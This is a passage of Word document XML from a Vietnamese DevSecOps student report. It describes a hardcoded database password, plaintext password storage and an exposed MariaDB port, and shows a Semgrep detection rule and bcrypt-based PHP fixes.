          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thành viên phụ trách:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đào Xuân Mạnh (Kỹ sư Kiểm thử An ninh / QA &amp; Quality Gate Engineer).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất vấn đề an toàn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong phiên bản ban đầu của ứng dụng:</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Tệp kết nối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/web/src/lib/db.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa chuỗi mật khẩu root mặc định gán cứng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>$db_pass = "p@ssw0rd"</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Bảng cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lưu trữ mật khẩu của người dùng và quản trị viên dưới dạng văn bản thô (Plaintext), không áp dụng bất kỳ hàm băm mật mã nào. Khi hệ thống bị tấn công SQL Injection hoặc lộ sao lưu CSDL, toàn bộ mật khẩu người dùng bị lộ tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân loại nhóm lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗi mã nguồn (Application Source Code &amp; Data Storage).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha trong quy trình DevSecOps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha Build / Gate (Stage 2: SonarQube Quality Gate &amp; Semgrep Secrets Detection)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thực thi kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Security-as-Code</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Căn cứ vi phạm chính sách bảo vệ dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP — Điều 13 Khoản 2 Điểm a:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu bắt buộc áp dụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"biện pháp kỹ thuật, mật mã học để bảo vệ dữ liệu cá nhân"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Việc lưu trữ mật khẩu dạng rõ trong cơ sở dữ liệu và mã nguồn vi phạm trực tiếp nguyên tắc bảo vệ mật mã đối với dữ liệu xác thực người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR — Article 5(1)(f) &amp; Article 25:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vi phạm nguyên tắc bảo mật thông tin (Confidentiality) và nguyên tắc bảo vệ dữ liệu mặc định (Data protection by default).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SonarQube kích hoạt quy tắc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>secrets:S6702</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Credentials should not be hard-coded) và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S181</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Semgrep thực thi quy tắc tùy biến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php-hardcoded-db-password-fallback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khai báo trong tệp cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/semgrep-local-rules.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), bắt giữ các cú pháp gán chuỗi tĩnh làm mật khẩu dự phòng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức xử lý và khắc phục:</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Tách toàn bộ thông tin xác thực sang biến môi trường hệ thống và nạp qua GitHub Repository Secrets (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_SSH_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PROD_HOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>DB_PASS</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Nâng cấp toàn bộ cơ chế lưu trữ mật khẩu trong cơ sở dữ liệu sang thuật toán băm mật mã mạnh một chiều Bcrypt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>PASSWORD_BCRYPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) với hệ số chi phí tính toán an toàn (Cost Factor = 12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đoạn mã demo thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc Semgrep phát hiện chuỗi gán cứng và đoạn mã băm mật khẩu Bcrypt:</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1. Quy tắc phát hiện Semgrep trong ci/semgrep-local-rules.yml:</w:t>
              <w:br/>
              <w:t xml:space="preserve">  rules:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    - id: php-hardcoded-db-password-fallback</w:t>
              <w:br/>
              <w:t xml:space="preserve">      languages: [php]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      severity: ERROR</w:t>
              <w:br/>
              <w:t xml:space="preserve">      message: A database password has a hardcoded fallback. Require a secret from the environment instead.</w:t>
              <w:br/>
              <w:t xml:space="preserve">      patterns:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - pattern: "getenv('DB_PASS') ?: $FALLBACK"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        - metavariable-regex:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            metavariable: $FALLBACK</w:t>
              <w:br/>
              <w:t xml:space="preserve">            regex: ^['"].+['"]$</w:t>
              <w:br/>
              <w:t xml:space="preserve">      metadata:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cwe: "CWE-798: Use of Hard-coded Credentials"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        owasp: "A07:2021 Identification and Authentication Failures"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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2. Đoạn mã vá lỗi: Nạp bí mật từ biến môi trường và mã hóa Bcrypt</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $db_pass = getenv('DB_PASS'); // Loại bỏ hoàn toàn fallback chuỗi tĩnh</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  // Mã hóa mật khẩu trước khi lưu trữ vào bảng users</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $hashed_password = password_hash($raw_password, PASSWORD_BCRYPT, ['cost' =&gt; 12]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt = $pdo-&gt;prepare("INSERT INTO users (username, password, email) VALUES (:user, :hash, :email)");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt-&gt;execute(['user' =&gt; $username, 'hash' =&gt; $hashed_password, 'email' =&gt; $email]);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  // Xác thực đăng nhập an toàn chống tấn công Timing Attack</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt = $pdo-&gt;prepare("SELECT id, password FROM users WHERE username = :user");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $stmt-&gt;execute(['user' =&gt; $username]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $user = $stmt-&gt;fetch();</w:t>
              <w:br/>
              <w:t xml:space="preserve">  if ($user &amp;&amp; password_verify($login_password, $user['password'])) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">      // Đăng nhập thành công an toàn</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1.4. Thành viên 4 — Lê Đức Anh: Mất an toàn cấu hình triển khai và nguy cơ lộ cổng cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thành viên phụ trách:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lê Đức Anh (Kỹ sư Tự động hóa Hạ tầng / CI/CD &amp; Cloud Infrastructure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất vấn đề an toàn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong quá trình đóng gói và triển khai môi trường máy chủ:</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Cấu hình Docker Compose ban đầu vô tình ánh xạ cổng cơ sở dữ liệu MariaDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3306:3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ra ngoài mạng công cộng, tạo điều kiện cho các tác nhân bên ngoài thực hiện tấn công dò quét mật khẩu Brute-force trực tiếp vào cơ sở dữ liệu.</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Xung đột không gian dự án Docker Compose (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>name conflict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) giữa khối Web và khối Giám sát dẫn tới việc các container vô tình bị tiêu hủy lẫn nhau khi dùng cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--remove-orphans</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Phân loại nhóm lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗi triển khai và hạ tầng vận hành (Deployment &amp; Infrastructure Operations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha trong quy trình DevSecOps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Pha Release / Deploy (Stage 3: Production Gate &amp; Stage 4: Production CD)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thực thi kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Security-as-Code &amp; Infrastructure-as-Code</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Căn cứ vi phạm chính sách bảo vệ dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP — Điều 13 Khoản 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vi phạm yêu cầu thiết lập vùng đệm an toàn và bảo vệ mạng máy tính lưu trữ dữ liệu cá nhân. Việc để cổng CSDL tiếp xúc với mạng Internet công cộng vi phạm nghiêm trọng nguyên tắc phân vùng an ninh mạng tối thiểu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR — Article 32 (Security of Processing):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vi phạm nghĩa vụ bảo đảm tính toàn vẹn, tính sẵn sàng và tính bảo mật liên tục của các hệ thống máy chủ xử lý dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Xây dựng công cụ kiểm tra tự động </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/validate_configs.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tại Stage 3 với 21 tiêu chí thẩm định: kiểm tra cấu hình cổng ánh xạ, phát hiện cổng 3306 bị expose ra ngoài host, kiểm tra tính toàn vẹn của volume mount và cú pháp Compose V2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cách thức xử lý và khắc phục:</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Đóng hoàn toàn cổng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> của container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</w:t>
      </w:r>
